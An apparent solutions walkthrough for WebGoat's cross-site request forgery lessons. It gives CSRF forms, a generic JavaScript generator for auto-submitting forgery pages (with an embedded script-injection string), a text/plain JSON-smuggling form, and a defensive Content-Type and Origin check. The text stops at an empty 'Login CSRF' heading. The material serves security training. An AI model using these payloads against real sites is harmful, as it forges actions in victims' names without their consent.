Cross-Site Request Forgeries

3/ Basic Get CSRF Exercise

<!-- Host this page on a different origin than WebGoat (another port, or a local file)
     so the browser sends a foreign Referer; the endpoint treats that as a successful CSRF. -->
<html>
<body>
  <form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
    <input name="csrf" value="false" type="hidden">
    <input name="submit" type="hidden" value="submit-Query">
    <input type="submit" value="Submit">
  </form>
</body>
</html>

4/ Post a review on someone else’s behalf

<!-- validateReq is not tied to the victim's session, so a fixed value is accepted.
     Fill reviewText and stars (or pre-set them with value="...") and submit while
     logged in to WebGoat in the same browser. -->
<html>
  <form method="POST" action="http://localhost:8080/WebGoat/csrf/review">
    <input class="form-control" name="reviewText" type="text">
    <input class="form-control" name="stars" type="text">
    <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
    <input type="submit" name="submit" value="Submit review">
  </form>
</html>
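The two payloads above are hand-written. As an added example (not part of the WebGoat lesson or its solutions), the script below generates the same kind of page for any endpoint and field set, HTML-escapes the values, and adds an inline script so the form submits on page load without a click. Endpoint, field names and the sample review text are taken from exercise 4; the assumption, as in the lesson, is that the target accepts form-encoded POSTs and checks neither Origin/Referer nor a per-session token.

```javascript
// Added example: generator for an auto-submitting CSRF proof-of-concept page.
// Not WebGoat code. Assumes the target accepts application/x-www-form-urlencoded
// POST bodies and performs no Origin/Referer or session-bound token check.

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Build a hidden form for `action` carrying `fields`. With autoSubmit the page
// submits itself on load, so the victim only has to open it while logged in.
function buildCsrfPoc(action, fields, { method = "POST", autoSubmit = true } = {}) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("\n");
  const submit = autoSubmit
    ? `  <script>document.getElementById("csrf").submit();</script>`
    : `  <!-- no auto-submit: the victim must click the button -->`;
  return [
    "<html>",
    "<body>",
    `  <form id="csrf" action="${escapeHtml(action)}" method="${method}">`,
    inputs,
    `    <input type="submit" value="Submit">`,
    "  </form>",
    submit,
    "</body>",
    "</html>",
  ].join("\n");
}

// Exercise 4, pre-filled: the victim's browser posts a review in their name.
// validateReq is the fixed value from the lesson form above.
const reviewPoc = buildCsrfPoc("http://localhost:8080/WebGoat/csrf/review", {
  reviewText: "posted by CSRF <script>alert(1)</script>",
  stars: "5",
  validateReq: "2aa14227b9a13d0bede0388a7fba9aa9",
  submit: "Submit review",
});

console.log(reviewPoc);
```

Save the printed page on any origin other than `localhost:8080` and open it in the browser that holds the WebGoat session. Because `form.submit()` does not include the submit button, `submit` is passed as a hidden field so the request body matches a clicked submission.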

7/ CSRF and content-type

<!-- With enctype="text/plain" the browser sends the body as name=value with no encoding.
     The JSON is placed in the input name and the inserted "=" lands inside the
     throwaway "ignoreme" field, so a server that ignores Content-Type parses valid JSON.
     text/plain form posts need no CORS preflight, which is why this works cross-origin. -->
<form enctype="text/plain" method="POST" action="http://localhost:8080/WebGoat/csrf/feedback/message">
  <input type="hidden" name='{"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignoreme":"' value='sdfsdfdf"}'>
  <button>submit</button>
</form>
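To see why the form above produces a body the feedback endpoint parses, the added example below (not WebGoat code) reproduces the browser's text/plain serialisation, parses the result as JSON, and then shows a server-side check that rejects it: require a declared `application/json` Content-Type and a same-origin Origin/Referer. The handler shape `acceptFeedback(req)` and the request objects are assumptions for illustration, not WebGoat's API.

```javascript
// Added example, not WebGoat code: text/plain form encoding, the JSON it
// yields for the exercise 7 payload, and an assumed server-side check.

// Browser rule for enctype="text/plain": one "name=value" pair per line,
// CRLF-terminated, with no percent-encoding of either name or value.
function encodeTextPlainForm(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// The single hidden input from the exercise 7 form: [name, value].
const exercise7Fields = [
  [
    '{"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignoreme":"',
    'sdfsdfdf"}',
  ],
];

// What a server that ignores Content-Type and just JSON-decodes the body sees.
function parseAsJson(body) {
  return JSON.parse(body);
}

// Assumed handler: accept only bodies declared as JSON and only from our origin.
// A browser form post can never declare application/json, and an attacker page
// cannot forge the Origin header, so both checks independently stop the forgery.
const ALLOWED_ORIGIN = "http://localhost:8080"; // assumed deployment origin

function sameOrigin(headerValue) {
  if (!headerValue) return false;
  try {
    return new URL(headerValue).origin === ALLOWED_ORIGIN;
  } catch {
    return false;
  }
}

function acceptFeedback(req) {
  const ct = req.headers["content-type"] || "";
  if (!/^application\/json\b/i.test(ct)) {
    return { ok: false, reason: "content-type must be application/json" };
  }
  if (!sameOrigin(req.headers["origin"] || req.headers["referer"])) {
    return { ok: false, reason: "cross-origin request" };
  }
  try {
    const msg = JSON.parse(req.body);
    return { ok: true, message: msg };
  } catch {
    return { ok: false, reason: "invalid json" };
  }
}

const body = encodeTextPlainForm(exercise7Fields);
console.log(body);                 // the raw request body the browser sends
console.log(parseAsJson(body));    // ignoreme holds "=sdfsdfdf"
console.log(acceptFeedback({
  headers: { "content-type": "text/plain", origin: "http://attacker.example" },
  body,
}));
```

The Origin check is a defence in depth; a per-session anti-CSRF token is still the primary control, since some clients omit Origin and Referer can be suppressed by referrer policy.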

8/ Login CSRF attack
